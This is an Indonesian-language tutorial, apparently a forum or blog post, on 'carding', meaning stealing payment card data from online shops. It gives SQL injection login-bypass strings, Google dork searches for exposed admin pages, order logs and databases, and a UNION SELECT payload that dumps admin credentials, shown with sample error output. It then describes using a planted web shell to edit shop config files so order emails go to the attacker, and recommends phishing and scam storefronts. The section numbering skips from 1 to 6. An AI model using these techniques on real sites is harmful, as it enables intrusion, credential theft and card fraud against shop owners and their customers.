Cara Melakukan CARDING
Cara Melakukan CARDING
Cara Melakukan CARDING
1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
# Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini
pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb
Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :
http://www.namasitusnya.com/shop/admin/shopadmin.asp
Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)
http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt
Selamat menemukan :)
Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb
Selamat mencari.. ^^
Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :
[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh
button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.
The details of the error are shown below. Please quote this in any correspondance regarding this problem.
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image,
i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales,
i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description,
c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND
ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20))
LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]
Contoh:
Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
Misal target:
[url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp,
dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘[email protected]‘;
Nah pada bagian ini “var $ordermailsendto = ‘[email protected]‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var
$ordermailsendto = ‘[email protected]‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..
6. Phising & Scaming
# Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje
bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin.
Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si
korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject.
Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email,
soalnya biasanya klo scam set kirimnya ke email sang owner.